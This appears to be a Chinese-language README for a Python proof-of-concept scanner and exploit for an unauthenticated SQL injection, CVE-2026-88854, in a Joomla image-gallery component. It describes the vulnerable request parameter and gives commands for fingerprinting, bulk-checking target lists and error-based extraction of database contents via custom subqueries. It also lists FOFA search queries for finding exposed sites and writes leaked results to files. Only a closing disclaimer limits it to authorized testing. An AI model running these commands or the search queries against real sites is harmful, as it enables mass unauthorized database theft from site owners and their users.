针对 Joomla 的 OrdaSoft OS Responsive Image Gallery 中 CVE-2026-88854 的 Python 3 PoC 扫描器/漏洞利用工具。
| 组件 | com_osgallery, com_osgallery_light |
| 受影响版本 | 1.0.0 – 6.2.6 |
| 修复版本 | 6.2.7+ |
| CVSS 4.0 | 9.3(严重) |
| 认证 | 无(公开的 mod_osgallery_search) |
| CWE | CWE-89 |
showSearchResult() / showSearchResultAjax() 通过 $input->getVar() 读取 textsearch / searchText,该方法未应用正确的 SQL 转义。该值被拼接到 LIKE 子句中。未认证的访问者可以利用 UNION 风格的注入读取数据库内容。
典型请求面:
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...
旧版安装可能使用任务名 searhResult(拼写错误)。
pip install -r requirements.txtpip install -r requirements.txt
# 指纹识别 + 严格 SQLi 探测(报错 / 时间 / EXTRACTVALUE)
python poc.py -u https://target.example --mode check
# 批量检查
python poc.py --list targets.example.txt --mode check --threads 30 --quiet
# MySQL 基于报错的读取(默认子查询:VERSION())
python poc.py -u https://target.example --mode exploit
python poc.py -u https://target.example --mode exploit \
--subquery "SELECT DATABASE()"
# 批量利用(将泄露结果写入 exploited.txt,而非 hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
--output exploit_results.jsonl --vuln-list exploited.txt
# 按 manifest 版本对先前的批量检查重新分层(可选)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl
| 选项 | 描述 |
|---|---|
-u, --url | 单个目标基础 URL(子目录安装:包含路径) |
--list | 目标列表文件(每行一个 URL) |
--mode | check 或 exploit |
--subquery | EXTRACTVALUE 内的 SQL(利用模式,默认 SELECT VERSION()) |
--threads, -j | 批量并发数(默认 20) |
--timeout | HTTP 超时秒数(默认 20) |
--proxy | HTTP(S) 代理 URL |
--output | JSONL 结果(默认 cve_2026_88854_results.jsonl) |
--vuln-list | 检查 → hits.txt;利用 → exploited.txt |
--quiet, -q | 减少进度输出 |
| 文件 | 内容 |
|---|---|
cve_2026_88854_results.jsonl | 每个目标的 JSON |
hits.txt | 候选 URL(exploitable_candidate) |
status 值(检查)| 状态 | 含义 |
|---|---|
sqli_confirmed | 基于报错/时间的 SQLi 或已验证的 EXTRACTVALUE 泄露 |
likely_vulnerable_version | Manifest 版本 ≤ 6.2.6 + 搜索端点 |
likely_component | 检测到 Gallery,版本未知 |
boolean_inconclusive | 仅响应长度差异(通常是 WAF);不计为已确认 |
patched_version | Manifest 版本 > 6.2.6 |
component_no_search_endpoint | 组件存在,但搜索任务不可达 |
no_component | 未检测到 com_osgallery |
audit_scan.py)在批量 检查 之后,运行 audit_scan.py 重新获取管理员 manifest 并拆分目标:
| 文件 | 内容 |
|---|---|
hits_version_lte_626.txt | Manifest gallery 版本 ≤ 6.2.6 |
hits_component_endpoint.txt | Gallery + 端点,版本不可读 |
hits_patched.txt | Manifest > 6.2.6 |
fofa_stale.txt | 无组件(过期的 FOFA 记录) |
cve_2026_88854_audit.jsonl | 增强的 JSONL |
Gallery 版本从 administrator/components/com_osgallery/osgallery.xml 中的 <version> 元素读取,而非 Joomla 的 extension version= 属性。
EXTRACTVALUE;MariaDB/Postgres、禁用报错或 WAF 可能导致 无泄露,即使该 CVE 适用。https://host/site)。app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore
本地目标列表和运行产物(list.txt、fofa*.csv、*.jsonl、hits*.txt 等)位于 .gitignore 中,不应提交。
仅用于 授权的安全测试。您有责任遵守适用的法律和项目规则。